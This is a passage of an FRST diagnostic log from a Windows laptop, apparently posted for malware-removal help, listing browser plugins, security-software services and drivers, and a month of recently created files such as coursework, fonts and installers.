FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2021-04-08] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: Adobe Acrobat -> 
C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2021-03-06] (Adobe Inc. -> Adobe Systems Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-04-21] (Adobe Inc. -> Adobe Systems Inc.)   Chrome:  ======= CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee]   ==================== Services (Whitelisted) ===================   (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)   R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169672 2021-01-25] (Adobe Inc. -> Adobe Inc.) R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3780296 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3548360 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [8798600 2021-04-21] (Microsoft Corporation -> Microsoft Corporation) R2 CxUtilSvc; C:\Program Files\Conexant\SAII\CxUtilSvc.exe [132096 2016-05-12] (Conexant Systems, Inc.) [File not signed] S2 Dolby DAX2 API Service; C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [194048 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) S3 FvSvc; C:\Program Files\NVIDIA Corporation\FrameViewSDK\nvfvsdksvc_x64.exe [409456 2021-03-30] (NVIDIA Corporation -> NVIDIA) R2 ImControllerService; C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) 
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7391408 2021-05-06] (Malwarebytes Inc -> Malwarebytes) R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [971976 2021-04-30] (McAfee, LLC -> McAfee, LLC) R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_20_12\McApExe.exe [780032 2021-03-31] (McAfee, LLC -> McAfee, LLC) S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [583344 2020-11-03] (McAfee, LLC -> McAfee, LLC) R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\4.1.106.0\\McCSPServiceHost.exe [2787160 2021-03-29] (McAfee, LLC -> McAfee, LLC) S3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [645736 2020-12-10] (McAfee, Inc. -> McAfee, LLC) R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [645736 2020-12-10] (McAfee, Inc. -> McAfee, LLC) R3 mfevtp; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [645736 2020-12-10] (McAfee, Inc. -> McAfee, LLC) R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1631736 2021-03-29] (McAfee, LLC -> McAfee, LLC) S3 OfficeSvcManagerAddons; C:\WINDOWS\system32\dllhost.exe /Processid:{2CA2E202-932F-4BA2-8771-195BB86398F5} [21312 2020-10-16] (Microsoft Windows -> Microsoft Corporation) R2 PEFService; C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe [4241112 2021-03-29] (McAfee, LLC -> McAfee, LLC) S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\NisSrv.exe [2624104 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MsMpEng.exe [128376 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation)   ===================== Drivers (Whitelisted) ===================   (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)   
S3 AppleKmdfFilter; C:\WINDOWS\System32\drivers\AppleKmdfFilter.sys [20640 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.) S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.) R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [75712 2020-12-11] (McAfee, Inc. -> McAfee, LLC) S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [218960 2020-05-26] (McAfee, LLC -> McAfee, Inc.) R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [220752 2021-05-06] (Malwarebytes Inc -> Malwarebytes) S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [20936 2019-02-01] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes) S3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248992 2021-05-06] (Malwarebytes Inc -> Malwarebytes) R2 McPvDrv; C:\WINDOWS\system32\drivers\McPvDrv.sys [89112 2021-01-18] (McAfee, LLC -> McAfee, LLC) R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [544704 2020-12-11] (McAfee, Inc. -> McAfee, LLC) R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [385984 2020-12-11] (McAfee, Inc. -> McAfee, LLC) S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [85944 2020-12-11] (Microsoft Windows Early Launch Anti-malware Publisher -> McAfee, LLC) R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [522176 2020-12-11] (McAfee, Inc. -> McAfee, LLC) R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [1027520 2020-12-11] (McAfee, Inc. -> McAfee, LLC) R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [608192 2020-12-17] (McAfee, Inc. -> McAfee LLC.) S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [107968 2020-12-17] (McAfee, Inc. -> McAfee LLC.) R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [116672 2020-12-11] (McAfee, Inc. -> McAfee, LLC) S3 mferkdet; C:\WINDOWS\System32\drivers\mferkdet.sys [125688 2021-04-25] (McAfee, Inc. -> McAfee, Inc.) 
R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [252352 2020-12-11] (McAfee, Inc. -> McAfee, LLC)
S3 tapnordvpn; C:\WINDOWS\System32\drivers\tapnordvpn.sys [44896 2018-07-24] (TEFINCOM S.A. -> The OpenVPN Project)
S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [49560 2021-04-11] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [421088 2021-04-11] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [72928 2021-04-11] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-05-06 15:34 - 2021-05-06 15:36 - 000032925 _____ C:\Users\FRANCIS\Downloads\FRST.txt
2021-05-06 15:33 - 2021-05-06 15:35 - 000000000 ____D C:\FRST
2021-05-06 15:32 - 2021-05-06 15:32 - 002298368 _____ (Farbar) C:\Users\FRANCIS\Downloads\FRST64.exe
2021-05-06 14:48 - 2021-05-06 14:48 - 000000000 ___HD C:\ProgramData\Kawmq
2021-05-06 14:25 - 2021-05-06 14:25 - 001310832 _____ (Google LLC) C:\Users\FRANCIS\Downloads\ChromeSetup.exe
2021-05-06 11:57 - 2021-05-06 11:57 - 001687040 _____ C:\WINDOWS\system32\libcrypto.dll
2021-05-06 11:56 - 2021-05-06 11:56 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2021-05-06 11:56 - 2021-05-06 11:56 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2021-05-06 11:56 - 2021-05-06 11:56 - 001314120 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2021-05-06 11:56 - 2021-05-06 11:56 - 000700928 _____ C:\WINDOWS\system32\FsNVSDeviceSource.dll
2021-05-06 11:56 - 2021-05-06 11:56 - 000011351 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-05-06 11:54 - 2021-05-06 11:54 - 001163776 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-05-06 11:53 - 2021-05-06 11:53 - 001823816 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2021-05-06 11:53 - 2021-05-06 11:53 - 001393504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2021-05-06 11:53 - 2021-05-06 11:53 - 000060928 _____ C:\WINDOWS\system32\runexehelper.exe
2021-05-06 11:51 - 2021-05-06 11:51 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-05-06 11:51 - 2021-05-06 11:51 - 000013312 _____ C:\WINDOWS\system32\agentactivationruntimestarter.exe
2021-05-06 11:38 - 2021-05-06 11:38 - 000002040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2021-05-06 11:38 - 2021-05-06 11:38 - 000002028 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2021-05-06 11:38 - 2021-05-06 11:38 - 000002028 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2021-05-06 11:38 - 2021-05-06 11:38 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\mbam
2021-05-06 11:37 - 2021-05-06 11:37 - 000220752 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys
2021-05-06 11:36 - 2021-05-06 11:36 - 000248992 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2021-05-06 11:35 - 2021-05-06 11:34 - 000199128 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2021-05-06 11:34 - 2021-05-06 11:34 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-05-06 11:28 - 2021-05-06 11:28 - 000000000 ____D C:\Program Files\Malwarebytes
2021-05-06 09:27 - 2021-05-06 09:27 - 002078632 _____ (Malwarebytes) C:\Users\FRANCIS\Downloads\MBSetup.exe
2021-05-05 21:10 - 2021-05-06 10:23 - 000000000 ____D C:\Users\FRANCIS\Desktop\Hello Paris
2021-05-05 13:04 - 2021-05-05 13:05 - 000736768 _____ C:\Users\FRANCIS\Downloads\mws_gen_ode_ppt_euler.ppt
2021-05-04 20:39 - 2021-05-04 20:40 - 003578240 _____ (RCS LT) C:\Users\FRANCIS\Downloads\CCSetup.exe
2021-05-04 18:04 - 2021-05-04 18:04 - 000001134 _____ C:\Users\Public\Desktop\Web Navigation.lnk
2021-05-04 18:04 - 2021-05-04 18:04 - 000001134 _____ C:\ProgramData\Desktop\Web Navigation.lnk
2021-05-04 17:36 - 2019-02-01 11:20 - 000020936 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2021-05-04 17:35 - 2021-05-04 17:35 - 000000000 ____D C:\WINDOWS\system32\Drivers\etc\BACKUP
2021-05-04 09:30 - 2021-05-04 09:30 - 000125168 _____ (Zoom Video Communications, Inc.) C:\Users\FRANCIS\Downloads\Zoom_cm_ds_mv9ZFe0KOjFvdR5MS6xrZlbbY96oVd7AAzLVq@UT4O-2pbNxQCn-E8_kc4bbc386e4a84bbc_.exe
2021-05-03 21:46 - 2021-05-03 21:46 - 000112099 _____ C:\Users\FRANCIS\Downloads\Enriquez_JamesCarl_MP14.pdf
2021-05-03 20:58 - 2021-05-03 20:58 - 000012872 _____ (SurfRight B.V.) C:\WINDOWS\system32\bootdelete.exe
2021-05-03 19:54 - 2021-05-03 19:54 - 000206596 _____ C:\Users\FRANCIS\Downloads\Pentecostes_Daniela_MP12.pdf
2021-05-02 19:45 - 2021-05-02 19:45 - 001345893 _____ C:\Users\FRANCIS\Downloads\PS2.1-Ramos-Riano-San-Pedro-Santiago.pdf
2021-05-02 18:35 - 2021-05-02 18:35 - 000043135 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210502-103502.zip
2021-05-02 17:52 - 2021-05-02 18:02 - 000000000 ____D C:\Users\FRANCIS\Desktop\Quarterpound
2021-05-02 16:41 - 2021-05-02 16:41 - 000001131 _____ C:\Users\FRANCIS\Desktop\CLUE Classic.lnk
2021-05-02 16:41 - 2021-05-02 16:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CLUE Classic
2021-05-02 16:16 - 2021-05-02 16:16 - 000000000 ____D C:\Users\FRANCIS\Desktop\fonts-main
2021-05-02 16:14 - 2021-04-19 10:46 - 654079606 _____ C:\Users\FRANCIS\Desktop\fonts-main.zip
2021-05-02 16:02 - 2021-05-02 17:07 - 000000000 ____D C:\Program Files (x86)\CLUE Classic
2021-05-02 15:51 - 2021-05-02 15:51 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v4 - [FileWomen]
2021-05-02 15:42 - 2021-05-02 15:43 - 000000000 ____D C:\Users\FRANCIS\AppData\LocalLow\BitTorrent
2021-05-02 15:26 - 2021-05-02 15:26 - 000000000 ____D C:\Program Files (x86)\ReflexiveArcade
2021-05-01 20:38 - 2021-05-01 20:38 - 000427332 _____ C:\Users\FRANCIS\Downloads\Frankenstein-by-Shelley.txt
2021-05-01 20:38 - 2021-05-01 20:38 - 000000042 _____ C:\Users\FRANCIS\Downloads\simple.txt
2021-05-01 20:35 - 2021-05-01 20:35 - 000675711 _____ C:\Users\FRANCIS\Downloads\Distances.xlsx
2021-05-01 19:09 - 2021-05-01 19:09 - 000012176 _____ C:\Users\FRANCIS\Downloads\Introduction-to-Programming-with-MATLAB-solutions--master.zip
2021-05-01 19:09 - 2019-03-13 12:58 - 000000000 ____D C:\Users\FRANCIS\Desktop\Introduction-to-Programming-with-MATLAB-solutions--master
2021-05-01 18:42 - 2021-05-01 18:42 - 002308003 _____ C:\Users\FRANCIS\Downloads\introduction-to-programming-with-matlab-master.zip
2021-05-01 10:23 - 2021-05-01 10:23 - 000113329 _____ C:\Users\FRANCIS\Downloads\financials sample template format only(1)(1).xlsx
2021-04-30 18:04 - 2021-04-30 18:04 - 000112886 _____ C:\Users\FRANCIS\Downloads\financials sample template format (incomplete) (1).xlsx
2021-04-30 17:03 - 2021-04-30 17:04 - 000026514 _____ C:\Users\FRANCIS\Downloads\Book1-KeyAssumptions.xlsx
2021-04-29 20:20 - 2021-04-29 20:20 - 000959197 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-121954.zip
2021-04-29 20:05 - 2021-04-29 20:05 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Recovery Toolbox for RAR
2021-04-29 18:39 - 2021-04-29 18:40 - 000931837 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-103853.zip
2021-04-29 18:37 - 2021-04-29 18:37 - 001064473 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-103705.zip
2021-04-29 17:22 - 2021-04-29 17:22 - 000053020 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210429-092143.zip
2021-04-28 14:50 - 2021-04-28 14:51 - 000112886 _____ C:\Users\FRANCIS\Downloads\financials sample template format (incomplete).xlsx
2021-04-28 13:20 - 2021-04-28 13:20 - 000003018 _____ C:\WINDOWS\system32\Tasks\McInstruTrack
2021-04-28 13:17 - 2021-04-28 13:17 - 000002138 _____ C:\Users\Public\Desktop\McAfee® Total Protection.lnk
2021-04-28 13:17 - 2021-04-28 13:17 - 000002138 _____ C:\ProgramData\Desktop\McAfee® Total Protection.lnk
2021-04-28 13:15 - 2021-05-06 14:47 - 000000000 __RSD C:\Users\FRANCIS\Documents\McAfee Vaults
2021-04-28 13:15 - 2021-04-28 13:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2021-04-28 13:15 - 2021-04-28 13:15 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\McAfee File Lock
2021-04-28 13:15 - 2021-01-18 02:58 - 000089112 _____ (McAfee, LLC) C:\WINDOWS\system32\Drivers\McPvDrv.sys
2021-04-28 13:15 - 2020-05-26 00:12 - 000089096 _____ (McAfee, LLC) C:\WINDOWS\system32\Drivers\SET8D4E.tmp
2021-04-28 13:14 - 2020-05-26 00:11 - 000218960 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\HipShieldK.sys
2021-04-28 13:08 - 2021-04-28 16:51 - 000003316 _____ C:\WINDOWS\system32\Tasks\McAfeeLogon
2021-04-28 13:01 - 2021-05-05 14:53 - 000000000 ____D C:\Program Files (x86)\McAfee
2021-04-28 13:01 - 2021-04-28 16:53 - 000000000 ____D C:\Program Files\McAfee
2021-04-28 13:01 - 2021-04-28 16:52 - 000000000 ____D C:\Program Files\Common Files\McAfee
2021-04-28 13:01 - 2021-04-28 14:07 - 000003706 _____ C:\WINDOWS\system32\Tasks\McAfee Remediation (Prepare)
2021-04-28 13:01 - 2021-04-28 13:04 - 000000000 ____D C:\Program Files\McAfee.com
2021-04-28 13:01 - 2021-04-28 13:01 - 000000000 ____D C:\Program Files\Common Files\AV
2021-04-28 09:18 - 2021-04-28 13:22 - 000000049 _____ C:\Users\FRANCIS\AppData\Roaming\MCVi2UserDetail.ini
2021-04-28 09:10 - 2021-04-28 09:14 - 005794408 _____ (McAfee, LLC) C:\Users\FRANCIS\Downloads\mcafee_trial_setup_433.0207.3919_key.exe
2021-04-27 19:32 - 2021-04-27 19:32 - 000205659 _____ C:\Users\FRANCIS\Downloads\chapter_9__Practice_questions_and_solutions.docx.pdf
2021-04-27 18:30 - 2021-04-27 18:30 - 000178921 _____ C:\Users\FRANCIS\Downloads\chapter_8_practice_questions_solution.docx.pdf
2021-04-27 18:06 - 2021-04-27 18:08 - 004323668 _____ C:\Users\FRANCIS\Downloads\Gas Power  Cycle.zip
2021-04-27 18:06 - 2021-04-27 18:06 - 001022464 _____ C:\Users\FRANCIS\Downloads\Lecture 2 Gas Power Cycle.ppt
2021-04-27 18:04 - 2021-04-27 18:05 - 004372125 _____ C:\Users\FRANCIS\Downloads\Rankine Cycle with Regeneration.zip
2021-04-27 09:00 - 2021-04-27 09:00 - 000030252 _____ C:\WINDOWS\system32\servers.def.lkg
2021-04-27 09:00 - 2021-04-27 09:00 - 000030252 _____ C:\WINDOWS\system32\servers.def
2021-04-27 09:00 - 2021-04-27 09:00 - 000011324 _____ C:\WINDOWS\system32\uat64.vpx
2021-04-27 09:00 - 2021-04-27 09:00 - 000003313 _____ C:\WINDOWS\system32\servers.def.vpx
2021-04-27 09:00 - 2021-04-27 09:00 - 000003304 _____ C:\WINDOWS\system32\.tmp
2021-04-27 09:00 - 2021-04-27 09:00 - 000000604 _____ C:\WINDOWS\system32\prod-pgm.vpx
2021-04-27 09:00 - 2021-04-27 09:00 - 000000342 _____ C:\WINDOWS\system32\prod-vps.vpx
2021-04-26 20:34 - 2021-04-26 20:34 - 000282407 _____ C:\Users\FRANCIS\Downloads\Enriquez_JamesCarl_MP10.pdf
2021-04-25 17:25 - 2021-05-06 12:12 - 000000000 ____D C:\WINDOWS\system32\Tasks\McAfee
2021-04-25 17:14 - 2021-04-25 17:14 - 000125688 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\mferkdet.sys
2021-04-25 17:09 - 2020-12-10 20:36 - 000583720 _____ (McAfee, LLC) C:\WINDOWS\system32\mfevtps.exe
2021-04-25 17:08 - 2021-04-28 16:44 - 000000000 ____D C:\ProgramData\McAfee
2021-04-25 16:45 - 2021-05-06 14:34 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2021-04-25 16:44 - 2021-05-06 14:42 - 000388514 _____ C:\WINDOWS\ntbtlog.txt
2021-04-25 11:05 - 2021-04-26 17:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\Avast Software
2021-04-25 11:04 - 2021-04-25 11:04 - 000000000 ____D C:\Program Files\Common Files\Avast Software
2021-04-25 10:25 - 2021-04-25 10:25 - 000220392 _____ (AVAST Software) C:\Users\FRANCIS\Downloads\avast_free_antivirus_setup_online.exe
2021-04-23 21:06 - 2021-04-23 21:24 - 000000000 _RSHD C:\ProgramData\Key-Base
2021-04-23 21:06 - 2021-04-23 21:06 - 000000000 ____D C:\ProgramData\{42AFAFAD-2FE9-D459-E932-738DED275782}
2021-04-23 21:00 - 2021-04-23 21:05 - 009772064 _____ (Stellar Information Technology Pvt Ltd ) C:\Users\FRANCIS\Downloads\StellarRepairforPhoto.exe
2021-04-23 20:31 - 2021-04-23 20:31 - 000000000 ____D C:\Users\FRANCIS\Desktop\Easeus 23 20_31
2021-04-23 16:46 - 2021-04-23 16:46 - 000550953 _____ C:\Users\FRANCIS\Downloads\Rebyu.pdf
2021-04-23 15:43 - 2021-04-23 15:43 - 000528434 _____ C:\Users\FRANCIS\Downloads\MARKETING_PLAN_TECHNICAL_PLAN_PRICING_PLAN.docx.pdf
2021-04-23 15:26 - 2021-04-23 15:27 - 004500974 _____ C:\Users\FRANCIS\Downloads\IE103_FINAL_BUSINESS_PLAN_FACE_SHIELD.docx.pdf
2021-04-23 15:24 - 2021-04-23 15:24 - 000787017 _____ C:\Users\FRANCIS\Downloads\CADELI__A_AMIEL_Technical_Plan_InventorEaze.docx.pdf
2021-04-22 21:21 - 2021-04-23 12:12 - 000000000 ____D C:\Users\FRANCIS\Downloads\sims3worldtool167
2021-04-22 21:18 - 2021-04-22 21:18 - 000008531 _____ C:\Users\FRANCIS\Downloads\sims3worldtool167_archive.torrent
2021-04-21 16:53 - 2021-04-21 16:53 - 000041503 _____ C:\Users\FRANCIS\Downloads\financials sample template format updated 4-21-21.xlsx
2021-04-21 15:55 - 2021-04-21 15:55 - 000000000 ____D C:\Users\FRANCIS\Downloads\PengRobinson
2021-04-21 15:54 - 2021-04-21 15:54 - 000001965 _____ C:\Users\FRANCIS\Downloads\PengRobinson.zip
2021-04-21 15:03 - 2021-04-21 15:03 - 000000000 ____D C:\Users\FRANCIS\Downloads\Lecture 5. Finding the Roots
2021-04-19 09:34 - 2021-04-19 09:34 - 000000000 ____D C:\Users\FRANCIS\Downloads\Mission Gothic
2021-04-18 10:22 - 2021-04-18 10:22 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Carved
2021-04-18 10:21 - 2021-04-18 10:21 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Sans
2021-04-18 10:20 - 2021-04-18 10:21 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Slab
2021-04-18 10:16 - 2021-04-18 10:19 - 000000000 ____D C:\Users\FRANCIS\Downloads\Novecento Slab Rough
2021-04-17 21:49 - 2021-04-17 21:50 - 027357835 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-134918.zip
2021-04-17 21:34 - 2021-04-17 21:36 - 025680562 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-133438.zip
2021-04-17 20:29 - 2021-04-17 20:30 - 001378716 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122915.zip
2021-04-17 20:27 - 2021-04-17 20:27 - 001391374 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122711.zip
2021-04-17 20:24 - 2021-04-17 20:24 - 001307436 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122359.zip
2021-04-17 20:22 - 2021-04-17 20:22 - 001320474 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-122211.zip
2021-04-17 20:15 - 2021-04-17 20:16 - 001642500 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-121554.zip
2021-04-17 20:13 - 2021-04-17 20:14 - 001642946 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210417-121341.zip
2021-04-17 18:02 - 2021-04-17 18:03 - 051943779 _____ C:\Users\FRANCIS\Downloads\Problem Exercise 8.7 Power Cycle with regeneration.pdf
2021-04-17 16:37 - 2021-04-17 16:39 - 001959151 _____ C:\Users\FRANCIS\Downloads\Chapter 9.  Refrigeration and Liquefaction MCA.pptx
2021-04-17 16:28 - 2021-04-17 16:29 - 001329415 _____ C:\Users\FRANCIS\Downloads\Lecture 5. Finding the Roots.zip
2021-04-16 18:23 - 2021-04-20 09:44 - 000138601 _____ C:\Users\FRANCIS\Downloads\litmusports-results.pptx
2021-04-16 13:26 - 2021-04-16 13:26 - 000231248 _____ C:\WINDOWS\system32\containerdevicemanagement.dll
2021-04-15 20:59 - 2021-04-19 20:45 - 000000000 ____D C:\Users\FRANCIS\Desktop\YB COLLECTION
2021-04-15 16:21 - 2021-04-15 16:21 - 000043972 _____ C:\Users\FRANCIS\Downloads\11401.zip
2021-04-15 11:58 - 2020-08-14 15:59 - 000043416 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\NvModuleTracker.sys
2021-04-14 20:20 - 2021-04-14 20:22 - 000000000 ____D C:\Users\FRANCIS\Downloads\Eurostile Next
2021-04-14 20:20 - 2021-04-14 20:20 - 000000000 ____D C:\Users\FRANCIS\Downloads\American Typewriter
2021-04-14 20:19 - 2021-04-14 20:19 - 000000000 ____D C:\Users\FRANCIS\Downloads\Bebas Neue Pro
2021-04-14 20:18 - 2021-04-14 20:18 - 000000000 ____D C:\Users\FRANCIS\Downloads\Bebas Kai
2021-04-14 20:17 - 2021-04-14 20:18 - 000000000 ____D C:\Users\FRANCIS\Downloads\Bebas Neue
2021-04-14 20:17 - 2021-04-14 20:17 - 000000000 ____D C:\Users\FRANCIS\Downloads\Rosewood
2021-04-14 20:16 - 2021-04-14 20:16 - 000000000 ____D C:\Users\FRANCIS\Downloads\One Stroke Script
2021-04-14 17:44 - 2021-04-14 17:45 - 000714992 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-093253.zip
2021-04-14 17:06 - 2021-04-14 17:06 - 000073143 _____ C:\Users\FRANCIS\Downloads\the-sims-sans-cufonfonts.zip
2021-04-14 17:05 - 2021-04-14 17:05 - 000073333 _____ C:\Users\FRANCIS\Downloads\The-Sims-Sans-Font.zip
2021-04-14 16:25 - 2021-04-14 16:25 - 000575764 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-082508.zip
2021-04-14 16:24 - 2021-04-14 16:24 - 001638615 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-082414.zip
2021-04-14 16:18 - 2021-04-14 16:18 - 001593898 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-081827.zip
2021-04-14 16:15 - 2021-04-14 16:16 - 002110967 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210414-081533.zip
2021-04-13 18:08 - 2021-04-13 18:09 - 002648212 _____ C:\Users\FRANCIS\Downloads\eurostile-next-pro-cufonfonts.zip
2021-04-13 17:42 - 2021-04-13 17:42 - 000205230 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-094200.zip
2021-04-13 17:27 - 2021-04-13 17:27 - 000086034 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-092705.zip
2021-04-13 15:22 - 2021-04-13 15:22 - 000094518 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-072238.zip
2021-04-13 15:20 - 2021-04-13 15:20 - 000043667 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-072045.zip
2021-04-13 15:19 - 2021-04-13 15:19 - 000021551 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-071930.zip
2021-04-13 15:17 - 2021-04-13 15:17 - 001318241 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-071720.zip
2021-04-13 15:16 - 2021-04-13 15:16 - 001336842 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-071602.zip
2021-04-13 12:34 - 2021-04-13 12:35 - 000000000 ____D C:\Users\FRANCIS\Downloads\Akko
2021-04-13 12:34 - 2021-04-13 12:34 - 000000000 ____D C:\Users\FRANCIS\Downloads\FF Trademarker
2021-04-13 12:27 - 2021-04-13 12:28 - 000398306 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-042745.zip
2021-04-13 12:23 - 2021-04-13 12:23 - 000808345 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-042301.zip
2021-04-13 12:21 - 2021-04-13 12:21 - 001808740 _____ C:\Users\FRANCIS\Downloads\transfonter.org-20210413-042057.zip
2021-04-13 11:49 - 2021-04-13 11:49 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\npm-cache
2021-04-13 11:28 - 2021-04-13 11:30 - 000000000 ____D C:\Python39
2021-04-13 11:28 - 2021-04-13 11:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Python 3.9
2021-04-13 11:28 - 2021-04-13 11:28 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Package Cache
2021-04-13 11:08 - 2021-04-13 11:28 - 000000000 ____D C:\ProgramData\chocolatey
